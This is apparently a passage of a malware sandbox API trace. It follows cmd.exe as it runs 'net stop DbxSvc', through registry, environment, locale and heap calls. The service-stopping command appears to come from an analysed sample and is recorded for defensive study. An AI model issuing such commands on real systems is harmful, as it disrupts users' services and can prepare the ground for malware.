RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f734 | out: phkResult=0x36f734*=0x0) returned 0x2 [0061.619] VirtualQuery (in: lpAddress=0x36f76b, lpBuffer=0x36f704, dwLength=0x1c | out: lpBuffer=0x36f704*(BaseAddress=0x36f000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.619] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x36f704, dwLength=0x1c | out: lpBuffer=0x36f704*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0061.619] VirtualQuery (in: lpAddress=0x271000, lpBuffer=0x36f704, dwLength=0x1c | out: lpBuffer=0x36f704*(BaseAddress=0x271000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0061.619] VirtualQuery (in: lpAddress=0x273000, lpBuffer=0x36f704, dwLength=0x1c | out: lpBuffer=0x36f704*(BaseAddress=0x273000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.619] VirtualQuery (in: lpAddress=0x370000, lpBuffer=0x36f704, dwLength=0x1c | out: lpBuffer=0x36f704*(BaseAddress=0x370000, AllocationBase=0x370000, AllocationProtect=0x2, RegionSize=0x3000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0061.619] GetConsoleOutputCP () returned 0x1b5 [0061.620] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0061.620] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0061.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.620] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0061.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.620] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0061.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0061.620] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0061.620] _get_osfhandle (_FileHandle=0) returned 0x3 [0061.620] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0061.621] _get_osfhandle (_FileHandle=0) returned 0x3 [0061.621] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0061.621] GetEnvironmentStringsW () returned 0x782020* [0061.621] GetProcessHeap () returned 0x770000 [0061.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0xaca) returned 0x782af8 [0061.621] FreeEnvironmentStringsW (penv=0x782020) returned 1 [0061.621] GetProcessHeap () returned 0x770000 [0061.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x4) returned 0x780c58 [0061.621] GetEnvironmentStringsW () returned 0x782020* [0061.621] GetProcessHeap () returned 0x770000 [0061.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0xaca) returned 0x7835d0 [0061.622] FreeEnvironmentStringsW (penv=0x782020) returned 1 [0061.622] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x36e6a4 | out: phkResult=0x36e6a4*=0x68) returned 0x0 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x0, lpData=0x36e6b0*=0x0, lpcbData=0x36e6a8*=0x1000) returned 0x2 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x4, lpData=0x36e6b0*=0x1, lpcbData=0x36e6a8*=0x4) returned 0x0 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x0, lpData=0x36e6b0*=0x1, lpcbData=0x36e6a8*=0x1000) returned 0x2 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x4, lpData=0x36e6b0*=0x0, lpcbData=0x36e6a8*=0x4) returned 0x0 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x4, lpData=0x36e6b0*=0x40, lpcbData=0x36e6a8*=0x4) returned 0x0 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x4, lpData=0x36e6b0*=0x40, lpcbData=0x36e6a8*=0x4) returned 0x0 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x0, lpData=0x36e6b0*=0x40, lpcbData=0x36e6a8*=0x1000) returned 0x2 [0061.622] RegCloseKey (hKey=0x68) returned 0x0 [0061.622] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x36e6a4 | out: phkResult=0x36e6a4*=0x68) returned 0x0 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x0, lpData=0x36e6b0*=0x40, lpcbData=0x36e6a8*=0x1000) returned 0x2 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x4, lpData=0x36e6b0*=0x1, lpcbData=0x36e6a8*=0x4) returned 0x0 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x0, lpData=0x36e6b0*=0x1, lpcbData=0x36e6a8*=0x1000) returned 0x2 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x4, lpData=0x36e6b0*=0x0, lpcbData=0x36e6a8*=0x4) returned 0x0 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x4, lpData=0x36e6b0*=0x9, lpcbData=0x36e6a8*=0x4) returned 0x0 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x4, lpData=0x36e6b0*=0x9, lpcbData=0x36e6a8*=0x4) returned 0x0 [0061.622] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x36e6ac, lpData=0x36e6b0, lpcbData=0x36e6a8*=0x1000 | out: lpType=0x36e6ac*=0x0, lpData=0x36e6b0*=0x9, lpcbData=0x36e6a8*=0x1000) returned 0x2 [0061.623] RegCloseKey (hKey=0x68) returned 0x0 [0061.623] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebad [0061.623] srand (_Seed=0x5d97ebad) [0061.623] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop DbxSvc" [0061.623] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop DbxSvc" [0061.623] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0061.623] GetProcessHeap () returned 0x770000 [0061.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x210) returned 0x782020 [0061.623] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x782028, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0061.623] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0061.623] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0061.623] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0061.623] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0061.623] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0061.623] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0061.623] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0061.623] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0061.623] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0061.623] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0061.624] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0061.624] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0061.624] GetProcessHeap () returned 0x770000 [0061.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x782af8 | out: hHeap=0x770000) returned 1 [0061.624] GetEnvironmentStringsW () returned 0x782238* [0061.624] GetProcessHeap () returned 0x770000 [0061.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0xae2) returned 0x784b98 [0061.624] FreeEnvironmentStringsW (penv=0x782238) returned 1 [0061.624] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0061.624] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0061.624] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0061.624] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0061.624] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0061.624] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0061.624] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0061.624] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0061.624] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0061.624] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0061.624] GetProcessHeap () returned 0x770000 [0061.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x54) returned 0x785688 [0061.624] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x36f470 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0061.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x36f470, lpFilePart=0x36f46c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36f46c*="Desktop") returned 0x25 [0061.624] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0061.624] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x36f1ec | out: lpFindFileData=0x36f1ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x781ea0 [0061.625] FindClose (in: hFindFile=0x781ea0 | out: hFindFile=0x781ea0) returned 1 [0061.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x36f1ec | out: lpFindFileData=0x36f1ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x781ea0 [0061.625] FindClose (in: hFindFile=0x781ea0 | out: hFindFile=0x781ea0) returned 1 [0061.625] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0061.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x36f1ec | out: lpFindFileData=0x36f1ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x781ea0 [0061.625] FindClose (in: hFindFile=0x781ea0 | out: hFindFile=0x781ea0) returned 1 [0061.625] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0061.625] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0061.625] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0061.625] GetProcessHeap () returned 0x770000 [0061.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x784b98 | out: hHeap=0x770000) returned 1 [0061.625] GetEnvironmentStringsW () returned 0x7840a8* [0061.625] GetProcessHeap () returned 0x770000 [0061.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0xb36) returned 0x785ee8 [0061.625] FreeEnvironmentStringsW (penv=0x7840a8) returned 1 [0061.625] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0061.625] GetProcessHeap () returned 0x770000 [0061.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x785688 | out: hHeap=0x770000) returned 1 [0061.626] GetProcessHeap () returned 0x770000 [0061.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x400e) returned 0x786a28 [0061.626] GetProcessHeap () returned 0x770000 [0061.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x2c) returned 0x781ea0 [0061.626] GetProcessHeap () returned 0x770000 [0061.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x786a28 | out: hHeap=0x770000) returned 1 [0061.626] GetConsoleOutputCP () returned 0x1b5 [0061.774] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0061.774] GetUserDefaultLCID () returned 0x409 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x36f5b0, cchData=128 | out: lpLCData="0") returned 2 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x36f5b0, cchData=128 | out: lpLCData="0") returned 2 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x36f5b0, cchData=128 | out: lpLCData="1") returned 2 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0061.775] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0061.775] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0061.779] GetProcessHeap () returned 0x770000 [0061.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20c) returned 0x782db0 [0061.779] GetConsoleTitleW (in: lpConsoleTitle=0x782db0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0061.780] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0061.780] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0061.780] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0061.780] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0061.780] GetProcessHeap () returned 0x770000 [0061.780] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x400a) returned 0x786a28 [0061.780] GetProcessHeap () returned 0x770000 [0061.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x786a28 | out: hHeap=0x770000) returned 1 [0061.780] _wcsicmp (_String1="net", _String2=")") returned 69 [0061.781] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0061.781] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0061.781] _wcsicmp (_String1="IF", _String2="net") returned -5 [0061.781] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0061.781] _wcsicmp (_String1="REM", _String2="net") returned 4 [0061.781] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0061.781] GetProcessHeap () returned 0x770000 [0061.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x58) returned 0x782fc8 [0061.781] GetProcessHeap () returned 0x770000 [0061.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x10) returned 0x77fef8 [0061.781] GetProcessHeap () returned 0x770000 [0061.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x22) returned 0x783028 [0061.782] GetConsoleTitleW (in: lpConsoleTitle=0x36f2a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0061.782] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0061.782] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0061.782] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0061.782] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0061.782] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0061.782] _wcsicmp (_String1="net", _String2="CD") returned 11 [0061.782] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0061.782] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0061.782] _wcsicmp (_String1="net", _String2="REN") returned -4 [0061.782] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0061.782] _wcsicmp (_String1="net", _String2="SET") returned -5 [0061.782] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0061.782] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0061.782] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0061.782] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0061.782] _wcsicmp (_String1="net", _String2="MD") returned 1 [0061.782] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0061.782] _wcsicmp (_String1="net", _String2="RD") returned -4 [0061.782] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0061.783] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0061.783] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0061.783] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0061.783] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0061.783] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0061.783] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0061.783] _wcsicmp (_String1="net", _String2="VER") returned -8 [0061.783] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0061.783] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0061.783] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0061.783] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0061.783] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0061.783] _wcsicmp (_String1="net", _String2="START") returned -5 [0061.783] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0061.783] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0061.783] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0061.783] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0061.783] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0061.783] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0061.783] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0061.783] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0061.783] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0061.783] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0061.783] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0061.783] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0061.783] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0061.783] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0061.783] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0061.783] _wcsicmp (_String1="net", _String2="CD") returned 11 [0061.783] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0061.783] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0061.783] _wcsicmp (_String1="net", _String2="REN") returned -4 [0061.783] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0061.783] _wcsicmp (_String1="net", _String2="SET") returned -5 [0061.784] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0061.784] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0061.784] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0061.784] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0061.784] _wcsicmp (_String1="net", _String2="MD") returned 1 [0061.784] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0061.784] _wcsicmp (_String1="net", _String2="RD") returned -4 [0061.784] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0061.784] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0061.784] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0061.784] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0061.784] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0061.784] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0061.784] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0061.784] _wcsicmp (_String1="net", _String2="VER") returned -8 [0061.784] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0061.784] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0061.784] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0061.784] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0061.784] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0061.784] _wcsicmp (_String1="net", _String2="START") returned -5 [0061.784] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0061.784] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0061.784] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0061.784] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0061.784] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0061.784] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0061.784] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0061.784] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0061.784] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0061.784] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0061.784] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0061.784] _wcsicmp (_String1="net", _String2="IF") returned 5 [0061.784] _wcsicmp (_String1="net", _String2="REM") returned -4 [0061.785] GetProcessHeap () returned 0x770000 [0061.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x210) returned 0x783058 [0061.785] GetProcessHeap () returned 0x770000 [0061.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x2a) returned 0x783270 [0061.785] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0061.785] GetProcessHeap () returned 0x770000 [0061.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x418) returned 0x7707f0 [0061.785] SetErrorMode (uMode=0x0) returned 0x0 [0061.785] SetErrorMode (uMode=0x1) returned 0x0 [0061.785] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7707f8, lpFilePart=0x36edc8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36edc8*="Desktop") returned 0x25 [0061.785] SetErrorMode (uMode=0x0) returned 0x1 [0061.785] GetProcessHeap () returned 0x770000 [0061.785] RtlReAllocateHeap (Heap=0x770000, Flags=0x0, Ptr=0x7707f0, Size=0x5c) returned 0x7707f0 [0061.785] GetProcessHeap () returned 0x770000 [0061.785] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x7707f0) returned 0x5c [0061.785] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0061.785] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0061.785] GetProcessHeap () returned 0x770000 [0061.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x120) returned 0x7832a8 [0061.785] GetProcessHeap () returned 0x770000 [0061.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x238) returned 0x770858 [0061.792] GetProcessHeap () returned 0x770000 [0061.792] RtlReAllocateHeap (Heap=0x770000, Flags=0x0, Ptr=0x770858, Size=0x122) returned 0x770858 [0061.792] GetProcessHeap () returned 0x770000 [0061.792] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x770858) returned 0x122 [0061.792] 